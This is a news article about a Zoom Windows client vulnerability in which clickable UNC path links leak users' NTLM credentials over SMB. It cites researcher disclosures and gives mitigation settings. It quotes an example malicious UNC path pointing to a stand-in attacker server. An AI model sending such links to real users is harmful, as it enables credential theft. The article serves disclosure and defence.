Zoom security vulnerability can be used to steal Windows login credentials
Zoom's popularity has accelerated in recent weeks thanks to the number of people now forced to work from home and conduct meetings online. Now security researchers have discovered a worrying vulnerability in the software that could be used to steal Windows login credentials.
The vulnerability steams from the fact that Zoom converts URLs that are sent in messages into clickable links. The same is true for UNC paths, and if such a link is clicked, it is possible to grab a user's login name and their NTLM password hash and decrypt it.
- Marriott International reveals details of another data breach
- Zoom apologizes for Facebook privacy fiasco and updates app to stop data sharing
- Why is Zoom secretly sharing data with Facebook?
As reported by Bleeping Computer, security researcher g0dmode (or Mitch) and Matthew Hickey (@HackerFantastic) both discovered the vulnerability and the potential havoc it could reach. If someone sends a messages that takes the form \\malicious.server\media\image.jpg, another user may click it expecting to see an image (or, perhaps they would if the UNC path was named slightly less obviously!).
When the link is clicked, Windows will try to connect to the path, even if it doesn't actually exist. While attempting to connect using the SMB protocol, the user's login name and their NTLM password hash are sent, and these can be intercepted and decrypted with relative ease.
Hickey shared details of his findings on Twitter:
Hi @zoom_us & @NCSC - here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted). pic.twitter.com/gjWXas7TMO
— Hacker Fantastic (@hackerfantastic) March 31, 2020
Hickey has notified Zoom of this issue, and also the fact that the same technique could be used to launch applications on a remote computer. He says: "Zoom should not render UNC paths as hyperlinks is the fix, I have notified Zoom as I disclosed it on Twitter".
There is a way to mitigate against this security vulnerability as Bleeping Computer explains. In Group Policy Editor, you can navigate to Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers, and select Deny all.
If you don't have access to Group Policy Editor, fire up the Registry Editor, head to HKEY_LOCAL_MACHINE\SYSTEM\C urrentControlSet\Control\Lsa\MSV1_0 and create a new DWORD value called RestrictSendingNTLMTraffic, giving it a value of 2.